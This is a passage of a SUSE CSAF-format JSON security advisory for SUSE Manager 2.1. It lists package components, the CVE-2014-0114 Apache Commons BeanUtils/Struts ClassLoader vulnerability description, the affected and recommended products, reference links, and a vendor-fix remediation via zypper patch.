"full_product_name": {
"name": "spacewalk-backend-xml-export-libs-2.1.55.15-0.7.11.s390x as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:spacewalk-backend-xml-export-libs-2.1.55.15-0.7.11.s390x"
},
"product_reference": "spacewalk-backend-xml-export-libs-2.1.55.15-0.7.11.s390x",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-xmlrpc-2.1.55.15-0.7.11.s390x as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:spacewalk-backend-xmlrpc-2.1.55.15-0.7.11.s390x"
},
"product_reference": "spacewalk-backend-xmlrpc-2.1.55.15-0.7.11.s390x",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-base-2.1.60.12-0.7.7.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:spacewalk-base-2.1.60.12-0.7.7.noarch"
},
"product_reference": "spacewalk-base-2.1.60.12-0.7.7.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-base-minimal-2.1.60.12-0.7.7.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:spacewalk-base-minimal-2.1.60.12-0.7.7.noarch"
},
"product_reference": "spacewalk-base-minimal-2.1.60.12-0.7.7.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-base-minimal-config-2.1.60.12-0.7.7.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:spacewalk-base-minimal-config-2.1.60.12-0.7.7.noarch"
},
"product_reference": "spacewalk-base-minimal-config-2.1.60.12-0.7.7.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-branding-2.1.33.10-0.7.16.s390x as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:spacewalk-branding-2.1.33.10-0.7.16.s390x"
},
"product_reference": "spacewalk-branding-2.1.33.10-0.7.16.s390x",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-certs-tools-2.1.6.5-0.7.10.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:spacewalk-certs-tools-2.1.6.5-0.7.10.noarch"
},
"product_reference": "spacewalk-certs-tools-2.1.6.5-0.7.10.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-check-2.1.16.6-0.7.9.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:spacewalk-check-2.1.16.6-0.7.9.noarch"
},
"product_reference": "spacewalk-check-2.1.16.6-0.7.9.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-client-setup-2.1.16.6-0.7.9.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:spacewalk-client-setup-2.1.16.6-0.7.9.noarch"
},
"product_reference": "spacewalk-client-setup-2.1.16.6-0.7.9.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-client-tools-2.1.16.6-0.7.9.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:spacewalk-client-tools-2.1.16.6-0.7.9.noarch"
},
"product_reference": "spacewalk-client-tools-2.1.16.6-0.7.9.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-config-2.1.5.4-0.7.15.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:spacewalk-config-2.1.5.4-0.7.15.noarch"
},
"product_reference": "spacewalk-config-2.1.5.4-0.7.15.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-doc-indexes-2.1.2.3-0.7.26.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:spacewalk-doc-indexes-2.1.2.3-0.7.26.noarch"
},
"product_reference": "spacewalk-doc-indexes-2.1.2.3-0.7.26.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-grail-2.1.60.12-0.7.7.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:spacewalk-grail-2.1.60.12-0.7.7.noarch"
},
"product_reference": "spacewalk-grail-2.1.60.12-0.7.7.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-html-2.1.60.12-0.7.7.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:spacewalk-html-2.1.60.12-0.7.7.noarch"
},
"product_reference": "spacewalk-html-2.1.60.12-0.7.7.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-java-2.1.165.14-0.7.16.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:spacewalk-java-2.1.165.14-0.7.16.noarch"
},
"product_reference": "spacewalk-java-2.1.165.14-0.7.16.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-java-config-2.1.165.14-0.7.16.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:spacewalk-java-config-2.1.165.14-0.7.16.noarch"
},
"product_reference": "spacewalk-java-config-2.1.165.14-0.7.16.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-java-lib-2.1.165.14-0.7.16.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:spacewalk-java-lib-2.1.165.14-0.7.16.noarch"
},
"product_reference": "spacewalk-java-lib-2.1.165.14-0.7.16.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-java-oracle-2.1.165.14-0.7.16.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:spacewalk-java-oracle-2.1.165.14-0.7.16.noarch"
},
"product_reference": "spacewalk-java-oracle-2.1.165.14-0.7.16.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-java-postgresql-2.1.165.14-0.7.16.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:spacewalk-java-postgresql-2.1.165.14-0.7.16.noarch"
},
"product_reference": "spacewalk-java-postgresql-2.1.165.14-0.7.16.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-pxt-2.1.60.12-0.7.7.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:spacewalk-pxt-2.1.60.12-0.7.7.noarch"
},
"product_reference": "spacewalk-pxt-2.1.60.12-0.7.7.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-reports-2.1.14.8-0.7.10.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:spacewalk-reports-2.1.14.8-0.7.10.noarch"
},
"product_reference": "spacewalk-reports-2.1.14.8-0.7.10.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-search-2.1.14.6-0.7.18.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:spacewalk-search-2.1.14.6-0.7.18.noarch"
},
"product_reference": "spacewalk-search-2.1.14.6-0.7.18.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-setup-2.1.14.9-0.7.6.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:spacewalk-setup-2.1.14.9-0.7.6.noarch"
},
"product_reference": "spacewalk-setup-2.1.14.9-0.7.6.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-setup-jabberd-2.1.0.2-0.7.6.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:spacewalk-setup-jabberd-2.1.0.2-0.7.6.noarch"
},
"product_reference": "spacewalk-setup-jabberd-2.1.0.2-0.7.6.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-sniglets-2.1.60.12-0.7.7.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:spacewalk-sniglets-2.1.60.12-0.7.7.noarch"
},
"product_reference": "spacewalk-sniglets-2.1.60.12-0.7.7.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-taskomatic-2.1.165.14-0.7.16.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:spacewalk-taskomatic-2.1.165.14-0.7.16.noarch"
},
"product_reference": "spacewalk-taskomatic-2.1.165.14-0.7.16.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-utils-2.1.27.12-0.7.25.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:spacewalk-utils-2.1.27.12-0.7.25.noarch"
},
"product_reference": "spacewalk-utils-2.1.27.12-0.7.25.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalksd-5.0.14.6-0.7.15.s390x as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:spacewalksd-5.0.14.6-0.7.15.s390x"
},
"product_reference": "spacewalksd-5.0.14.6-0.7.15.s390x",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "struts-1.2.9-162.33.22.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:struts-1.2.9-162.33.22.noarch"
},
"product_reference": "struts-1.2.9-162.33.22.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "supportutils-plugin-susemanager-1.0.3-0.5.5.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:supportutils-plugin-susemanager-1.0.3-0.5.5.noarch"
},
"product_reference": "supportutils-plugin-susemanager-1.0.3-0.5.5.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "supportutils-plugin-susemanager-client-1.0.4-0.5.5.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:supportutils-plugin-susemanager-client-1.0.4-0.5.5.noarch"
},
"product_reference": "supportutils-plugin-susemanager-client-1.0.4-0.5.5.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "suseRegisterInfo-2.1.9-0.7.29.s390x as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:suseRegisterInfo-2.1.9-0.7.29.s390x"
},
"product_reference": "suseRegisterInfo-2.1.9-0.7.29.s390x",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "susemanager-2.1.17-0.7.11.s390x as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:susemanager-2.1.17-0.7.11.s390x"
},
"product_reference": "susemanager-2.1.17-0.7.11.s390x",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "susemanager-client-config_en-pdf-2.1-0.15.24.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:susemanager-client-config_en-pdf-2.1-0.15.24.noarch"
},
"product_reference": "susemanager-client-config_en-pdf-2.1-0.15.24.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "susemanager-install_en-pdf-2.1-0.15.24.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:susemanager-install_en-pdf-2.1-0.15.24.noarch"
},
"product_reference": "susemanager-install_en-pdf-2.1-0.15.24.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "susemanager-jsp_en-2.1-0.15.23.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:susemanager-jsp_en-2.1-0.15.23.noarch"
},
"product_reference": "susemanager-jsp_en-2.1-0.15.23.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "susemanager-manuals_en-2.1-0.15.24.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:susemanager-manuals_en-2.1-0.15.24.noarch"
},
"product_reference": "susemanager-manuals_en-2.1-0.15.24.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "susemanager-proxy-quick_en-pdf-2.1-0.15.24.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:susemanager-proxy-quick_en-pdf-2.1-0.15.24.noarch"
},
"product_reference": "susemanager-proxy-quick_en-pdf-2.1-0.15.24.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "susemanager-reference_en-pdf-2.1-0.15.24.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:susemanager-reference_en-pdf-2.1-0.15.24.noarch"
},
"product_reference": "susemanager-reference_en-pdf-2.1-0.15.24.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "susemanager-schema-2.1.50.11-0.7.8.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:susemanager-schema-2.1.50.11-0.7.8.noarch"
},
"product_reference": "susemanager-schema-2.1.50.11-0.7.8.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "susemanager-sync-data-2.1.5-0.7.6.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:susemanager-sync-data-2.1.5-0.7.6.noarch"
},
"product_reference": "susemanager-sync-data-2.1.5-0.7.6.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "susemanager-tools-2.1.17-0.7.11.s390x as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:susemanager-tools-2.1.17-0.7.11.s390x"
},
"product_reference": "susemanager-tools-2.1.17-0.7.11.s390x",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "susemanager-user_en-pdf-2.1-0.15.24.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:susemanager-user_en-pdf-2.1-0.15.24.noarch"
},
"product_reference": "susemanager-user_en-pdf-2.1-0.15.24.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "tanukiwrapper-3.2.3-0.10.12.s390x as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:tanukiwrapper-3.2.3-0.10.12.s390x"
},
"product_reference": "tanukiwrapper-3.2.3-0.10.12.s390x",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "yum-3.2.29-0.19.30.s390x as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:yum-3.2.29-0.19.30.s390x"
},
"product_reference": "yum-3.2.29-0.19.30.s390x",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "yum-common-3.2.29-0.19.30.s390x as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:yum-common-3.2.29-0.19.30.s390x"
},
"product_reference": "yum-common-3.2.29-0.19.30.s390x",
"relates_to_product_reference": "SUSE Manager 2.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "zypp-plugin-spacewalk-0.9.8-0.15.51.s390x as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:zypp-plugin-spacewalk-0.9.8-0.15.51.s390x"
},
"product_reference": "zypp-plugin-spacewalk-0.9.8-0.15.51.s390x",
"relates_to_product_reference": "SUSE Manager 2.1"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2014-0114",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2014-0114"
}
],
"notes": [
{
"category": "general",
"text": "Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to \"manipulate\" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Manager 2.1:apache2-mod_wsgi-3.3-5.7.17.s390x",
"SUSE Manager 2.1:auditlog-keeper-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-rdbms-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-spacewalk-validator-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-syslog-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-xmlout-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:cobbler-2.2.2-0.54.9.s390x",
"SUSE Manager 2.1:google-gson-2.2.4-0.7.52.noarch",
"SUSE Manager 2.1:libyaml-0-2-0.1.3-0.10.16.11.s390x",
"SUSE Manager 2.1:oracle-config-1.1-0.10.10.16.noarch",
"SUSE Manager 2.1:osa-dispatcher-5.11.33.7-0.7.16.noarch",
"SUSE Manager 2.1:perl-Class-Singleton-1.4-4.13.38.noarch",
"SUSE Manager 2.1:perl-NOCpulse-Object-1.26.13.2-0.7.13.noarch",
"SUSE Manager 2.1:perl-Satcon-1.20.2-0.7.6.noarch",
"SUSE Manager 2.1:perl-auditlog-keeper-client-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:postgresql91-pltcl-9.1.15-0.3.1.s390x",
"SUSE Manager 2.1:pxe-default-image-0.1-0.20.56.noarch",
"SUSE Manager 2.1:python-enum34-1.0-0.7.33.s390x",
"SUSE Manager 2.1:python-gzipstream-1.10.2.2-0.7.6.s390x",
"SUSE Manager 2.1:rhn-custom-info-5.4.22.6-0.7.13.noarch",
"SUSE Manager 2.1:rhnlib-2.5.69.6-0.7.6.s390x",
"SUSE Manager 2.1:rhnmd-5.3.18.4-0.7.15.noarch",
"SUSE Manager 2.1:rhnpush-5.5.71.7-0.7.16.noarch",
"SUSE Manager 2.1:sm-ncc-sync-data-2.1.9-0.7.6.noarch",
"SUSE Manager 2.1:smdba-1.5.1-0.7.6.s390x",
"SUSE Manager 2.1:spacecmd-2.1.25.7-0.7.9.s390x",
"SUSE Manager 2.1:spacewalk-admin-2.1.2.4-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-backend-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-app-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-applet-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-common-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-tool-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-iss-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-iss-export-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-libs-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-package-push-server-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-server-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-oracle-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-postgresql-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-tools-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-xml-export-libs-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-xmlrpc-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-base-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-base-minimal-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-base-minimal-config-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-branding-2.1.33.10-0.7.16.s390x",
"SUSE Manager 2.1:spacewalk-certs-tools-2.1.6.5-0.7.10.noarch",
"SUSE Manager 2.1:spacewalk-check-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-client-setup-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-client-tools-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-config-2.1.5.4-0.7.15.noarch",
"SUSE Manager 2.1:spacewalk-doc-indexes-2.1.2.3-0.7.26.noarch",
"SUSE Manager 2.1:spacewalk-grail-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-html-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-java-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-config-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-lib-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-oracle-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-postgresql-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-pxt-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-reports-2.1.14.8-0.7.10.noarch",
"SUSE Manager 2.1:spacewalk-search-2.1.14.6-0.7.18.noarch",
"SUSE Manager 2.1:spacewalk-setup-2.1.14.9-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-setup-jabberd-2.1.0.2-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-sniglets-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-taskomatic-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-utils-2.1.27.12-0.7.25.noarch",
"SUSE Manager 2.1:spacewalksd-5.0.14.6-0.7.15.s390x",
"SUSE Manager 2.1:struts-1.2.9-162.33.22.noarch",
"SUSE Manager 2.1:supportutils-plugin-susemanager-1.0.3-0.5.5.noarch",
"SUSE Manager 2.1:supportutils-plugin-susemanager-client-1.0.4-0.5.5.noarch",
"SUSE Manager 2.1:suseRegisterInfo-2.1.9-0.7.29.s390x",
"SUSE Manager 2.1:susemanager-2.1.17-0.7.11.s390x",
"SUSE Manager 2.1:susemanager-client-config_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-install_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-jsp_en-2.1-0.15.23.noarch",
"SUSE Manager 2.1:susemanager-manuals_en-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-proxy-quick_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-reference_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-schema-2.1.50.11-0.7.8.noarch",
"SUSE Manager 2.1:susemanager-sync-data-2.1.5-0.7.6.noarch",
"SUSE Manager 2.1:susemanager-tools-2.1.17-0.7.11.s390x",
"SUSE Manager 2.1:susemanager-user_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:tanukiwrapper-3.2.3-0.10.12.s390x",
"SUSE Manager 2.1:yum-3.2.29-0.19.30.s390x",
"SUSE Manager 2.1:yum-common-3.2.29-0.19.30.s390x",
"SUSE Manager 2.1:zypp-plugin-spacewalk-0.9.8-0.15.51.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2014-0114",
"url": "https://www.suse.com/security/cve/CVE-2014-0114"
},
{
"category": "external",
"summary": "SUSE Bug 778464 for CVE-2014-0114",
"url": "https://bugzilla.suse.com/778464"
},
{
"category": "external",
"summary": "SUSE Bug 875455 for CVE-2014-0114",
"url": "https://bugzilla.suse.com/875455"
},
{
"category": "external",
"summary": "SUSE Bug 885963 for CVE-2014-0114",
"url": "https://bugzilla.suse.com/885963"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Manager 2.1:apache2-mod_wsgi-3.3-5.7.17.s390x",
"SUSE Manager 2.1:auditlog-keeper-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-rdbms-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-spacewalk-validator-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-syslog-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-xmlout-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:cobbler-2.2.2-0.54.9.s390x",
"SUSE Manager 2.1:google-gson-2.2.4-0.7.52.noarch",
"SUSE Manager 2.1:libyaml-0-2-0.1.3-0.10.16.11.s390x",
"SUSE Manager 2.1:oracle-config-1.1-0.10.10.16.noarch",
"SUSE Manager 2.1:osa-dispatcher-5.11.33.7-0.7.16.noarch",
"SUSE Manager 2.1:perl-Class-Singleton-1.4-4.13.38.noarch",
"SUSE Manager 2.1:perl-NOCpulse-Object-1.26.13.2-0.7.13.noarch",
"SUSE Manager 2.1:perl-Satcon-1.20.2-0.7.6.noarch",
"SUSE Manager 2.1:perl-auditlog-keeper-client-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:postgresql91-pltcl-9.1.15-0.3.1.s390x",
"SUSE Manager 2.1:pxe-default-image-0.1-0.20.56.noarch",
"SUSE Manager 2.1:python-enum34-1.0-0.7.33.s390x",
"SUSE Manager 2.1:python-gzipstream-1.10.2.2-0.7.6.s390x",
"SUSE Manager 2.1:rhn-custom-info-5.4.22.6-0.7.13.noarch",
"SUSE Manager 2.1:rhnlib-2.5.69.6-0.7.6.s390x",
"SUSE Manager 2.1:rhnmd-5.3.18.4-0.7.15.noarch",
"SUSE Manager 2.1:rhnpush-5.5.71.7-0.7.16.noarch",
"SUSE Manager 2.1:sm-ncc-sync-data-2.1.9-0.7.6.noarch",
"SUSE Manager 2.1:smdba-1.5.1-0.7.6.s390x",
"SUSE Manager 2.1:spacecmd-2.1.25.7-0.7.9.s390x",
"SUSE Manager 2.1:spacewalk-admin-2.1.2.4-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-backend-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-app-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-applet-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-common-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-tool-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-iss-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-iss-export-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-libs-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-package-push-server-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-server-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-oracle-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-postgresql-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-tools-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-xml-export-libs-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-xmlrpc-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-base-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-base-minimal-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-base-minimal-config-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-branding-2.1.33.10-0.7.16.s390x",
"SUSE Manager 2.1:spacewalk-certs-tools-2.1.6.5-0.7.10.noarch",
